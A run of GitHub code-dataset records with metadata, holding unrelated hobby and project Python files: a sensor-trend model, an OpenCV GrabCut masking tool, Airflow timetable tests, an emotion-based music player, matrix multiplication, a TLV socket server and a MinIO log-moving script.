(((mean(xaxis) * mean(yaxis)) - mean(xaxis*yaxis)) / ((mean(xaxis)**2) - mean(xaxis**2)))\n return slope\n\n ''' Function to return averages for sensors in a field for the entire week'''\n def filterByField(self, field):\n allSensorQuery = {\"assigned_field\": field}\n fieldSlopes = []\n result = self.sensorsCollection.find(allSensorQuery)\n for entry in result:\n oneSlope = self.getSlopesFromSensorData(self.filterBySensor(entry['mac']), entry['mac'], field)\n fieldSlopes.append(oneSlope)\n return self.getFieldAverages(fieldSlopes, field)\n\n '''Function to make averages for data by sensors in a field using slopes generated for each sensor'''\n def getFieldAverages(self, slopes, field):\n lightAverage = 0\n tempAverage = 0\n moistureAverage = 0\n for slope in slopes:\n lightAverage += slope.light\n tempAverage += slope.temperature\n moistureAverage += slope.moisture\n if len(slopes) > 0:\n lightAverage = lightAverage / len(slopes)\n tempAverage = tempAverage / len(slopes)\n moistureAverage = moistureAverage / len(slopes)\n slopeAverages = Averages(lightAverage/1e-6, tempAverage/1e-6, moistureAverage/1e-6, field)\n return slopeAverages.toString()\n\n def close(self):\n self.client.close()\n\n","repo_name":"smwatki2/SolarSENSE","sub_path":"app/modules/trendsModel.py","file_name":"trendsModel.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5255760432","text":"# main\nimport cv2 as cv\nimport numpy as np\n\n# utilities\nfrom pathlib import Path\nfrom typing import Union, Tuple\nfrom copy import deepcopy\nimport os\n\n# TODO remove this import\nimport utils\n\n\nclass Hotkeys:\n crop = ord(\"c\")\n background = ord(\"b\")\n probably_background = ord(\"1\")\n # TODO\n # probably_background = ord(\"B\")\n foreground = ord(\"f\")\n probably_foreground = ord(\"2\")\n # TODO\n # probably_foreground = ord(\"B\")\n\n inc_brush = ord(\"=\")\n dec_brush = ord(\"-\")\n grabcut = ord(\"g\")\n mask_generator = ord(\"a\")\n\n save = ord(\"s\")\n delete = ord(\"d\")\n close = ord(\"q\")\n reset = ord(\"r\")\n\n\nclass colors:\n blue = (255, 0, 0)\n green = (0, 255, 0)\n red = (0, 0, 255)\n black = (0, 0, 0)\n # TODO\n pink = (247, 7, 203)[::-1]\n white = (255, 255, 255)\n cyan = (7, 163, 247)[::-1]\n\n\nclass Mask:\n bg = 0\n fg = 1\n probably_bg = 2\n probably_fg = 3\n\n\nclass Utils:\n pass\n\n\ndef 
store_cursor_pos(func):\n def decorator(self, event, x, y, flags, params):\n # store cursor position in the application\n self.app._cursor_pos = (x, y)\n # call the mouse_cb\n func(self, event, x, y, flags, params)\n\n return decorator\n\n\nclass AppState:\n def __init__(self, app: \"IGrabcut\"):\n self.name = \"NOTIMPLEMENTED\"\n\n self.app = app\n\n self._empty_cb = lambda *args, **kwargs: None\n\n def set_mouse_cb(self, cb):\n if cb is None:\n cv.setMouseCallback(self.app.inwin_name, self._empty_cb)\n return\n\n cv.setMouseCallback(self.app.inwin_name, cb)\n\n\nclass Crop(AppState):\n def __init__(self, app: \"IGrabcut\"):\n super().__init__(app)\n self.name = \"crop\"\n\n # upper left corner, lower right corner\n self.p1, self.p2 = None, None\n\n self.set_mouse_cb(self.mouse_cb)\n\n self.drawing = False\n self.done = False\n\n def __call__(self):\n if self.done:\n return self.app.prev_app_state\n\n return self\n\n @store_cursor_pos\n def mouse_cb(self, event, x, y, flags, params):\n if event == cv.EVENT_LBUTTONDOWN:\n self.drawing = True\n self.init_rect(x, y)\n elif event == cv.EVENT_LBUTTONUP:\n self.drawing = False\n self.crop()\n self.done = True\n elif event == cv.EVENT_MOUSEMOVE and self.drawing:\n self.update_rect(x, y)\n\n def init_rect(self, x, y):\n self.p1 = (x, y)\n self.p2 = (x, y)\n self.render()\n\n def update_rect(self, x, y):\n self.p2 = (x, y)\n self.render()\n\n def crop(self):\n img = self.app.img\n\n x1, y1 = self.p1\n x2, y2 = self.p2\n\n xmin, xmax = min(x1, x2), max(x1, x2)\n ymin, ymax = min(y1, y2), max(y1, y2)\n\n # region of interest; the inside of the crop\n roi = img[ymin:ymax, xmin:xmax]\n\n # everything background, except roi\n img = np.zeros_like(img)\n img[y1:y2, x1:x2] = roi\n\n self.app.img = img\n\n if self.app._mask is None:\n self.app._mask = np.zeros(img.shape[:2], dtype=np.uint8)\n\n self.app._mask[y1:y2, x1:x2] = Mask.probably_fg\n self.app._crop = (x1, y1, x2 - x1, y2 - y1)\n\n self.render()\n\n def render(self):\n img = self.app.img\n cv.rectangle(img, self.p1, self.p2, colors.black)\n self.app._show_img = img\n\n\nclass IncreseBrush(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"increase brush\"\n\n def __call__(self):\n self.app._brush_size += 2\n return self.app.prev_app_state\n\n\nclass DecreaseBrush(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"decrease brush\"\n\n def __call__(self):\n # TODO maybe config\n if self.app._brush_size > 1:\n self.app._brush_size -= 2\n\n return self.app.prev_app_state\n\n\nclass DrawGround(AppState):\n def __init__(self, app, color, value, Derived):\n super().__init__(app)\n self.color = color\n self.value = value\n self.Derived = Derived\n self.drawing = False\n\n self.set_mouse_cb(self.mouse_cb)\n\n if self.app._mask is None:\n self.app._mask = np.zeros(self.app._img.shape[:2], dtype=np.uint8)\n\n def __call__(self):\n return self\n\n @store_cursor_pos\n def mouse_cb(self, event, x, y, *args):\n if event == cv.EVENT_LBUTTONDOWN:\n self.drawing = True\n self.draw(x, y)\n self.render()\n elif event == cv.EVENT_LBUTTONUP:\n self.drawing = False\n self.render()\n elif event == cv.EVENT_MOUSEMOVE and self.drawing:\n self.draw(x, y)\n self.render()\n\n def draw(self, x, y):\n # TODO thickness?\n self.app.img = cv.circle(\n self.app._img, (x, y), self.app._brush_size // 2, self.color, -1\n )\n self.app._mask = cv.circle(\n self.app._mask, (x, y), self.app._brush_size // 2, self.value, -1\n )\n\n def render(self):\n self.app._show_img = 
self.app.img\n\n\nclass DrawForeground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.blue, Mask.fg, DrawForeground)\n self.name = \"foreground\"\n\n\nclass DrawProbablyForeground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.cyan, Mask.probably_fg, DrawProbablyForeground)\n self.name = \"probably foreground\"\n\n\nclass DrawBackground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.red, Mask.bg, DrawBackground)\n self.name = \"background\"\n\nclass DrawProbablyBackground(DrawGround):\n def __init__(self, app):\n super().__init__(app, colors.pink, Mask.bg, DrawProbablyBackground)\n self.name = \"probably background\"\n\n\nclass Reset(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"reset\"\n\n def __call__(self):\n self.app.img = self.app._original_img.copy()\n self.app._show_img = self.app.img\n\n return BaseState(self.app)\n\n\nclass Grabcut(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"grabcut\"\n\n def __call__(self):\n if self.app._mask is None:\n print(\"No mask set, either crop the img, or draw bg / fg.\")\n return self.app.prev_app_state\n\n mask, bg_model, fg_model = cv.grabCut(\n self.app._original_img.copy(),\n self.app._mask,\n self.app._crop,\n self.app._bg_model,\n self.app._fg_model,\n 5,\n cv.GC_INIT_WITH_MASK,\n )\n\n # TODO what is happening here? seems kinda wrong\n # mask = np.uint8(np.where((mask == Mask.bg) | (mask == Mask.probably_bg), 0, 1))\n # mask = np.logical_or(mask[mask == Mask.fg], mask[mask == Mask.probably_fg])\n mask = np.uint8((mask == Mask.fg) | (mask == Mask.probably_fg))\n mask = mask[..., np.newaxis]\n\n # store mask in the app\n self.app._saved_mask = mask.copy()\n\n self.app._fg_img = self.app._original_img * mask\n self.app._fg_img[np.logical_not(mask[:, :, 0])] = colors.red\n\n\n return self.app.prev_app_state if not self.app.auto_save else Save(self.app)\n\n\nclass Close(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"close\"\n\n def __call__(self):\n cv.destroyAllWindows()\n return self\n\n\nclass GenerateMask(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"mask generator\"\n\n def __call__(self):\n if self.app.mask_generator is None:\n print(\"Please set the mask_generator.\")\n return self.app.prev_app_state\n\n # generate mask from user defined function\n mask = self.app.mask_generator(self.app.img)\n\n self.app._mask = mask\n # TODO only if img has 3 channels\n self.app._img = self.app._img * (mask != 0)[..., np.newaxis]\n self.app._show_img = self.app.img\n\n return self.app.prev_app_state\n\n\nclass Save(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"save\"\n\n def __call__(self):\n basename = os.path.basename(self.app._img_path)\n name, ext = os.path.splitext(basename)\n\n # TODO name into init\n path = Path(self.app.output_dir) / f\"{name}_fg_mask{ext}\"\n cv.imwrite(str(path), self.app._saved_mask)\n print(f\"Saving to {path}.\")\n\n return self.app.prev_app_state\n\n\nclass Delete(AppState):\n def __init__(self, app):\n super().__init__(app)\n self.name = \"delete\"\n\n def __call__(self):\n # TODO merge with save\n basename = os.path.basename(self.app._img_path)\n name, ext = os.path.splitext(basename)\n\n path = Path(self.app.output_dir) / f\"{name}_fg{ext}\"\n if os.path.exists(path):\n os.remove(path)\n print(f\"Deleted {path}.\")\n else:\n print(f\"{path} does not exist.\")\n\n return 
self.app.prev_app_state\n\n\nclass BaseState(AppState):\n \"\"\" State to switch between states \"\"\"\n\n _states = {\n Hotkeys.crop: Crop,\n Hotkeys.inc_brush: IncreseBrush,\n Hotkeys.dec_brush: DecreaseBrush,\n Hotkeys.grabcut: Grabcut,\n Hotkeys.foreground: DrawForeground,\n Hotkeys.background: DrawBackground,\n Hotkeys.reset: Reset,\n }\n\n def __init__(self, app):\n super().__init__(app)\n self.name = \"base\"\n\n self.set_mouse_cb(self.mouse_cb)\n\n def __call__(self):\n return self.app.app_state\n\n @store_cursor_pos\n def mouse_cb(self, *args):\n pass\n\n\nclass IGrabcut:\n # fmt: off\n _states = {\n Hotkeys.grabcut: Grabcut,\n Hotkeys.crop: Crop,\n Hotkeys.foreground: DrawForeground,\n Hotkeys.probably_foreground: DrawProbablyForeground,\n Hotkeys.background: DrawBackground,\n Hotkeys.probably_background: DrawProbablyBackground,\n Hotkeys.mask_generator: GenerateMask,\n\n Hotkeys.inc_brush: IncreseBrush,\n Hotkeys.dec_brush: DecreaseBrush,\n\n Hotkeys.save: Save,\n Hotkeys.delete: Delete,\n Hotkeys.reset: Reset,\n Hotkeys.close: Close,\n }\n # fmt: on\n\n def __init__(\n self,\n output_dir: Union[Path, str],\n auto_save: bool = True,\n inwin_name=\"input\",\n outwin_name=\"output\",\n waitkey_delay=1,\n ):\n self.app_state = None\n self.waitkey_delay = waitkey_delay\n\n # windows\n self.inwin_name = inwin_name\n self.outwin_name = outwin_name\n\n # output\n self.auto_save = auto_save\n self.output_dir = output_dir\n\n # TODO naming function\n\n # images\n self._img_path = None\n self._original_img = None\n self._img = None\n self._show_img = None\n self._fg_img = None\n # TODO ?\n self._bg_img = None\n\n # ui\n self._cursor_pos = (0, 0)\n self._brush_size = 19\n\n # grabcut\n self.mask_generator = None\n self._mask = None\n self._crop = None\n self._bg_model = np.zeros((1, 65), dtype=np.float64)\n self._fg_model = np.zeros((1, 65), dtype=np.float64)\n\n def imread(self, path: Union[Path, str], resize: int, channels: int = 3):\n self._img_path = str(path)\n\n color_type = cv.IMREAD_GRAYSCALE if channels == 1 else None\n img = cv.imread(self._img_path, color_type)\n img = utils.resize_max_axis(img, resize)\n\n self._img = img\n self._original_img = self.img\n self._show_img = self.img\n self._fg_img = self.img\n\n def run(self, path: Union[Path, str], resize=1000):\n self.imread(path, resize)\n\n cv.namedWindow(self.outwin_name, cv.WINDOW_AUTOSIZE)\n cv.namedWindow(self.inwin_name, cv.WINDOW_AUTOSIZE)\n\n self.app_state = BaseState(self)\n\n while self.app_state.name != \"close\":\n\n img = self._show_img.copy()\n img = self.render_state(img)\n img = self.render_brush(img)\n img = self.render_cross(img)\n\n cv.imshow(self.inwin_name, img)\n cv.imshow(self.outwin_name, self._fg_img)\n\n # apply the current state\n self.app_state = self.app_state()\n\n key = self.pressed_key\n if key not in self._states:\n continue\n\n State = self._states[key]\n # some states restore the state after they we're applied, hence store\n # the old one\n self.prev_app_state = deepcopy(self.app_state)\n\n # initialize the new state\n self.app_state = State(self)\n\n @property\n def pressed_key(self):\n return 0xFF & cv.waitKey(self.waitkey_delay)\n\n @property\n def img(self):\n return self._img.copy()\n\n @img.setter\n def img(self, other):\n self._img = other\n\n # TODO all into seperate renderer\n def render_state(self, img):\n img = cv.putText(\n img,\n self.app_state.name,\n (10, 20),\n cv.FONT_HERSHEY_SIMPLEX,\n 1,\n colors.red,\n 2,\n cv.LINE_8,\n )\n return img\n\n def render_brush(self, img):\n 
img = cv.circle(\n img, self._cursor_pos, self._brush_size // 2, colors.red, 2, cv.LINE_8\n )\n return img\n\n def render_cross(self, img):\n h, w = img.shape[:2]\n\n xcur, ycur = self._cursor_pos\n\n left, right = (0, ycur), (w - 1, ycur)\n img = cv.line(img, left, right, colors.red, 1)\n\n top, bot = (xcur, 0), (xcur, h - 1)\n img = cv.line(img, top, bot, colors.red, 1)\n\n return img\n","repo_name":"Dimfred/masterthesis","sub_path":"code/utils/igrabcut.py","file_name":"igrabcut.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32689833023","text":"from __future__ import annotations\n\nimport pendulum\nimport pytest\n\nfrom airflow.settings import TIMEZONE\nfrom airflow.timetables.base import DagRunInfo, DataInterval, TimeRestriction, Timetable\nfrom airflow.timetables.events import EventsTimetable\n\nSTART_DATE = pendulum.DateTime(2021, 9, 4, tzinfo=TIMEZONE) # Precedes all events\n\nEVENT_DATES = [\n pendulum.DateTime(2021, 9, 6, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 7, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE), # deliberate duplicate, should be ignored\n pendulum.DateTime(2021, 10, 9, tzinfo=TIMEZONE), # deliberately out of order\n pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE),\n]\n\nEVENT_DATES_SORTED = [\n pendulum.DateTime(2021, 9, 6, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 7, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 8, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE),\n pendulum.DateTime(2021, 10, 9, tzinfo=TIMEZONE),\n]\n\nNON_EVENT_DATE = pendulum.DateTime(2021, 10, 1, tzinfo=TIMEZONE)\nMOST_RECENT_EVENT = pendulum.DateTime(2021, 9, 10, tzinfo=TIMEZONE)\n\n\n@pytest.fixture()\ndef restriction():\n return TimeRestriction(earliest=START_DATE, latest=None, catchup=True)\n\n\n@pytest.fixture()\ndef unrestricted_timetable():\n return EventsTimetable(event_dates=EVENT_DATES)\n\n\n@pytest.fixture()\ndef restricted_timetable():\n return EventsTimetable(event_dates=EVENT_DATES, restrict_to_events=True)\n\n\n@pytest.mark.parametrize(\n \"start, end\",\n list(zip(EVENT_DATES, EVENT_DATES)),\n)\ndef test_dag_run_info_interval(start: pendulum.DateTime, end: pendulum.DateTime):\n expected_info = DagRunInfo(run_after=end, data_interval=DataInterval(start, end))\n assert DagRunInfo.interval(start, end) == expected_info\n\n\ndef test_manual_with_unrestricted(unrestricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"When not using strict event dates, manual runs have run_after as the data interval\"\"\"\n manual_run_data_interval = unrestricted_timetable.infer_manual_data_interval(run_after=NON_EVENT_DATE)\n expected_data_interval = DataInterval.exact(NON_EVENT_DATE)\n assert expected_data_interval == manual_run_data_interval\n\n\ndef test_manual_with_restricted_middle(restricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"\n Test that when using strict event dates, manual runs after the first event have the\n most recent event's date as the start interval\n \"\"\"\n manual_run_data_interval = restricted_timetable.infer_manual_data_interval(run_after=NON_EVENT_DATE)\n expected_data_interval = DataInterval.exact(MOST_RECENT_EVENT)\n assert expected_data_interval == manual_run_data_interval\n\n\ndef test_manual_with_restricted_before(restricted_timetable: Timetable, restriction: TimeRestriction):\n \"\"\"\n Test that when using strict event 
dates, manual runs before the first event have the first event's date\n as the start interval\n \"\"\"\n manual_run_data_interval = restricted_timetable.infer_manual_data_interval(run_after=START_DATE)\n expected_data_interval = DataInterval.exact(EVENT_DATES[0])\n assert expected_data_interval == manual_run_data_interval\n\n\n@pytest.mark.parametrize(\n \"last_automated_data_interval, expected_next_info\",\n [\n pytest.param(DataInterval(day1, day1), DagRunInfo.interval(day2, day2))\n for day1, day2 in zip(EVENT_DATES_SORTED, EVENT_DATES_SORTED[1:])\n ]\n + [pytest.param(DataInterval(EVENT_DATES_SORTED[-1], EVENT_DATES_SORTED[-1]), None)],\n)\ndef test_subsequent_weekday_schedule(\n unrestricted_timetable: Timetable,\n restriction: TimeRestriction,\n last_automated_data_interval: DataInterval,\n expected_next_info: DagRunInfo,\n):\n \"\"\"The next four subsequent runs cover the next four weekdays each.\"\"\"\n next_info = unrestricted_timetable.next_dagrun_info(\n last_automated_data_interval=last_automated_data_interval,\n restriction=restriction,\n )\n assert next_info == expected_next_info\n","repo_name":"a0x8o/airflow","sub_path":"tests/timetables/test_events_timetable.py","file_name":"test_events_timetable.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"22009540421","text":"process_this_frame = True\nba={\n 'Chaarz,Happy':'Nenjil Nenjil.mp3',\n'KarthikM,Surprised':'ASirikkalamParakkalamMassTamilanioMusic.mp3',\n'karthika,Happy':'03 Chillax.mp3',\n'keerthanaD,Happy':'DARBARTamilChummaKizhiLyricVideoRajinikanthARMurugadossRingtone.mp3',\n'Dr.K.Kousalya,Happy':'Singapenne.mp3',\n}\ndef fv(frame=None):\n global last,process_this_frame\n # if frame and not frame.any():\n img=frame\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n name='Unknown'\n # Only process every other frame of video to save time\n if process_this_frame or 1:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(rgb_small_frame)\n face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n\n face_names = []\n for face_encoding in face_encodings:\n # See if the face is a match for the known face(s)\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding)\n name = \"Unknown\"\n\n # # If a match was found in known_face_encodings, just use the first one.\n # if True in matches:\n # first_match_index = matches.index(True)\n # name = known_face_names[first_match_index]\n\n # Or instead, use the known face with the smallest distance to the new face\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n\n # Display the results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 
35), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n \n facecasc = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = facecasc.detectMultiScale(gray,scaleFactor=1.3, minNeighbors=5)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y-50), (x+w, y+h+10), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n cropped_img = np.expand_dims(np.expand_dims(cv2.resize(roi_gray, (48, 48)), -1), 0)\n prediction = model.predict(cropped_img)\n maxindex = int(np.argmax(prediction))\n if maxindex!=last and 0:\n if maxindex==3:\n threading.Thread(play('03 Chillax.mp3'))\n elif maxindex==5:\n threading.Thread(play('06.Nenjil Nenjil.mp3'))\n else:\n threading.Thread(play('06.Nenjil Nenjil.mp3'))\n last=maxindex\n # threading.Thread(play(ba.get(f'{name.split(\".\")[0]},{emotion_dict[maxindex]}','03 Chillax.mp3')))\n \n\n print(name,emotion_dict[maxindex])\n sleep(5)\n # cv2.putText(frame, emotion_dict[maxindex], (x+20, y-60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n # cv2.imshow('Video', cv2.resize(frame,(1600,960),interpolation = cv2.INTER_CUBIC))\n \nfor file in os.listdir('fr/u/'):\n print(file)\n fv(cv2.imread(f'fr/u/{file}')) \n\n \n# emotions will be displayed on your face from the webcam feed\nif mode == \"display\" or 0:\n # start the webcam feed\n cap = cv2.VideoCapture(0)\n while True:\n # Find haar cascade to draw bounding box around face\n ret, frame = cap.read()\n if not ret:\n break\n fv(frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"karthikkec/Personalised-music-recommendation-system","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18958978112","text":"# MULTIPLICACION DE 2 MATRICES\n\n# FILAS MAT A\nFILAS_A=int(input(\"Introduce número de filas para MATRIZ A: \"))\nprint(\"\\n\")\n\n# COLUMNAS MAT A\nCOLUMNAS_A=int(input(\"Introduce número de columnas para MATRIZ A: \"))\nprint(\"\\n\")\n\n# COLUMNAS MAT B\n\"\"\"\n (porque para vida de multiplicar matrices, el numero de columnas de \n la primera matriz, debe ser igual al numero de filas de la segunda)\n\"\"\"\nCOLUMNAS_B=int(input(\"Introduce numero de columnas para MATRIZ B: \"))\nprint(\"\\n\")\n\n# MATRIZ A (inicializada en ceros)\nA=[]\nfor i in range(FILAS_A):\n # con append agrega ceros en el arreglo creado para A\n A.append([0]*COLUMNAS_A)\n\n# MATRIZ B (inicializada en ceros)\nB=[]\nfor i in range(COLUMNAS_A):\n # con append agrega ceros en el arreglo creado para B\n B.append([0]*COLUMNAS_B)\n\n# INTRODUCE VALORES PARA MATRIZ A\nfor i in range(FILAS_A):\n for j in range(COLUMNAS_A):\n A[i][j]=float(input(\"Introduce los valores de A en (%d, %d): \" % (i,j)))\n\n# INTRODUCE VALORES PARA MATRIZ B\nprint(\"\\n\")\nfor i in range(COLUMNAS_A):\n for j in range(COLUMNAS_B):\n B[i][j]=float(input(\"Introduce los valores de B en (%d, %d): \" % (i,j)))\n\n# MATRIZ C (inicializada en ceros, aqui se guardará el resultado de A x B)\nC=[]\nfor i in range(FILAS_A):\n # con append agrega ceros en el arreglo creado para C\n C.append([0]*COLUMNAS_B)\n\n# MULTIPLICACION DE MATRICES A y B\n\nfor i in range(FILAS_A):\n for j in range(COLUMNAS_B):\n for k in range(COLUMNAS_A):\n C[i][j] += A[i][k] * B[k][j]\n\n# MATRIZ 
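# (Annotation added: 'MATRIZ FINALE' marks the printout of the result matrix;
# the triple loop above is the textbook O(FILAS_A * COLUMNAS_A * COLUMNAS_B)
# hand-rolled product C = A x B. A hedged NumPy cross-check of the same
# result, assuming the nested lists built above:
#     import numpy as np
#     assert np.allclose(np.array(A) @ np.array(B), np.array(C))
# )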
FINALE\n\nprint(\"\\n MATRIZ RESULTANTE: \\n\")\n\nfor i in range(FILAS_A):\n R=[]\n for j in range(COLUMNAS_B):\n # con append agrega los valores de C en el nuevo arreglo R\n R.append(C[i][j])\n print(R)\nprint(\"\\n\")\n","repo_name":"miguel-respaldo/bootcamp-post-si","sub_path":"20220107/alejandro.cano/matrices.py","file_name":"matrices.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30091529780","text":"import sys,struct,socket\r\n\r\ndef nbyte_to_data(sock):\r\n size_info={'B':1,'H':2,'L':4,'Q':8,'d':8}\r\n \r\n tag=sock.recv(1).decode('utf-8')\r\n if not tag:\r\n return False\r\n else:\r\n if tag in size_info:\r\n size=size_info[tag]\r\n data=sock.recv(size)\r\n message=struct.unpack('!'+tag,data)[0]\r\n elif tag in 'sc':\r\n length=nbyte_to_data(sock)\r\n data=sock.recv(length)\r\n message=data.decode('utf-8')\r\n \r\n return message\r\ndef server(ip,port):\r\n listensock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n listensock.bind((ip,port))\r\n listensock.listen(5)\r\n \r\n sock,sockname=listensock.accept()\r\n while True:\r\n message=nbyte_to_data(sock)\r\n if not message:\r\n break\r\n else:\r\n print('receive %s from %s'%(message,sockname))\r\n \r\n sock.close()\r\n listensock.close()\r\n \r\nif len(sys.argv)!=3:\r\n print('Wrong format')\r\nelse:\r\n ip=sys.argv[1]\r\n port=int(sys.argv[2])\r\n server(ip,port)","repo_name":"eeeXun/homework","sub_path":"semester2/socket/TLV_Server.py","file_name":"TLV_Server.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74014262179","text":"import sqlite3\nimport io\nfrom minio import Minio\n\ncon = sqlite3.connect(\"database.sqlite\")\ncur = con.cursor()\n\n\nurl = \"play.minio.io\"\naccess_key = \"\"\nsecret_key = \"\"\nbucket = \"drone-logs\"\n\nclient = Minio(\n url,\n access_key=access_key,\n secret_key=secret_key,\n )\n\nobjects = [obj.object_name for obj in client.list_objects(\"drone\")]\nimport sys; sys.exit(1)\nfor row in cur.execute('select * from logs'):\n print(f'Moved {row[0]: 7}', end='\\r')\n client.put_object(\n bucket, str(row[0]), io.BytesIO(row[1]), content_type='binary/octet-stream', length=len(row[1]), \n )\ncur.execute('delete from logs')\ncon.close()\nprint('finished')\n","repo_name":"m42e/move-drone-ci-logs","sub_path":"move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"40122093236","text":"from info import response_code, constants\nfrom info.models import User, News, Category\nfrom info.modules.index import index_blu\nfrom flask import render_template, current_app, session, request, jsonify\nfrom info.utils.comment import user_login_data, g\n\n@index_blu.route('/news_list')\ndef index_news_list():\n \"\"\"提供主页新闻列表的数据\n 1 接受参数\n 2 检验参数\n 3 根据参数查询用户想看的新闻列表数据\n 4 构造响应的新闻列表数据\n 5 响应新闻列表数据\n \"\"\"\n # 1 接受参数\n args_dict = request.args\n page = args_dict.get('page', '1')\n per_page = args_dict.get('per_page', constants.HOME_PAGE_MAX_NEWS)\n category_id = args_dict.get('cid', '1')\n\n # 2 检验参数\n try:\n page = int(page)\n per_page = int(per_page)\n category_id = int(category_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=response_code.RET.PARAMERR, errmsg=\"参数错误\")\n\n # 3 根据参数查询用户想看的新闻列表数据\n\n # 如果分类id不为1,那么添加分类id的过滤\n try:\n if category_id 
== 1:\n # 从所有新闻中,根据时间倒序,每页取出10条数据\n paginate = News.query.order_by(News.create_time.desc()).paginate(page,per_page,False)\n\n else:\n # 从指定的分类中查询新闻根据时间倒序每页取10条数据\n paginate = News.query.filter(News.category_id==category_id).order_by(News.create_time.desc()).paginate(page, per_page, False)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=response_code.RET.DBERR, errmsg=\"数据查询失败\")\n # 获取查询出来的数据\n items = paginate.items\n # 获取到总页数\n total_page = paginate.pages\n # 获取当前所在页码\n current_page = paginate.page\n\n news_li = []\n for news in items:\n news_li.append(news.to_basic_dict())\n\n data = {\n 'news_li':news_li,\n 'total_page':total_page,\n 'current_page':current_page\n }\n\n\n # 返回数据\n return jsonify(errno=response_code.RET.OK, errmsg=\"ok\", data = data)\n\n\n@index_blu.route('/')\n@user_login_data\ndef index():\n \"\"\"首页\n 1.处理网页右上角用户展示数据\n 2.新闻点击排行的展示\n 3.新闻分类\n \"\"\"\n # redis_store.set(\"name\",'zxc')\n # 1.处理网页右上角用户展示数据\n # user_id = session.get('user_id', None)\n # user = None\n # if user_id:\n # # 表示用户已经登录,然后查询用户信息\n # try:\n # user = User.query.get(user_id)\n # except Exception as e:\n # current_app.logger.error(e)\n\n # 2.新闻点击排行的展示\n try:\n new_clicks = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)\n except Exception as e:\n current_app.logger.error(e)\n\n\n # 获取新闻分类\n categories = Category.query.all()\n # 定义列表保存分类数据\n categories_dicts = []\n\n\n for category in categories:\n # 拼接内容\n categories_dicts.append(category.to_dict())\n\n\n # 构造渲染模板上下文数据\n context = {\n 'user':g.user.to_dict() if g.user else None,\n 'new_clicks':new_clicks,\n 'categories_dicts':categories_dicts\n }\n\n\n return render_template('news/index.html', context = context)\n\n\n@index_blu.route('/favicon.ico', methods=['GET'])\ndef favicon():\n \"\"\"title左侧图标\"\"\"\n return current_app.send_static_file('news/favicon.ico')","repo_name":"WangLei0106/info_news","sub_path":"info/modules/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36788959968","text":"import argparse\n\nparser = argparse.ArgumentParser(prog='ArgTry',\n usage='%(prog)s [options]',\n description='Description for command 